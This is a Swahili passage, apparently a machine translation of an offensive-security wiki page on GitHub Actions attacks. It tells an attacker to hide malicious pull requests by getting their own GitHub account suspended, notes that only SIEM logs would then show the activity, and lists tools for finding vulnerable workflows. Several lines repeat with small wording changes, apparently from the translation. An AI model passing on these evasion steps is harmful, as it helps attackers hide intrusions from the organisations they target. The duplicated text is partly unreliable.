(Teknolojia kutoka [**hapa**](https://divyanshu-mehta.gitbook.io/researchs/hijacking-cloud-ci-cd-systems-for-fun-and-profit)) Kwanza kabisa, PR yoyote iliyoinuliwa inaonekana wazi kwa umma katika Github na kwa akaunti ya lengo ya GitHub. Katika GitHub kwa kawaida, **hatuwezi kufuta PR ya mtandao**, lakini kuna mabadiliko. Kwa akaunti za Github ambazo zime **simamishwa** na Github, PR zao zote **zinafuta moja kwa moja** na kuondolewa kutoka mtandao. Hivyo ili kuficha shughuli zako unahitaji ama kupata **akaunti yako ya GitHub isimamishwe au kupata akaunti yako iwe na alama**. Hii itaficha **shughuli zako zote** kwenye GitHub kutoka mtandao (kimsingi kuondoa PR zako zote za unyanyasaji)
Shirika katika GitHub lina ufanisi mkubwa katika kuripoti akaunti kwa GitHub. Unachohitaji kufanya ni kushiriki "mambo fulani" katika Issue na watakikisha akaunti yako imesimamishwa ndani ya masaa 12 :p na hapo umepata, umefanya unyakuzi wako usionekane kwenye github.
Shirika katika GitHub lina ufanisi mkubwa katika kuripoti akaunti kwa GitHub. Unachohitaji kufanya ni kushiriki "mambo fulani" katika Issue na watakikisha akaunti yako imesimamishwa ndani ya masaa 12 :p na hapo umepata, umefanya unyanyasaji wako usionekane kwenye github.
> [!WARNING]
> Njia pekee kwa shirika kugundua kuwa wamekuwa wakilengwa ni kuangalia rekodi za GitHub kutoka SIEM kwani kutoka UI ya GitHub PR itakuwa imeondolewa.
> Njia pekee kwa shirika kugundua kuwa wamekuwa wakilengwa ni kuangalia kumbukumbu za GitHub kutoka SIEM kwani kutoka kwa UI ya GitHub PR itakuwa imeondolewa.
## Tools
## Zana
Zana zifuatazo ni muhimu kupata Github Action workflows na hata kupata zile zenye udhaifu:
Zana zifuatazo ni muhimu kutafuta michakato ya Github Action na hata kupata zile zenye udhaifu:
- [https://github.com/CycodeLabs/raven](https://github.com/CycodeLabs/raven)
- [https://github.com/praetorian-inc/gato](https://github.com/praetorian-inc/gato)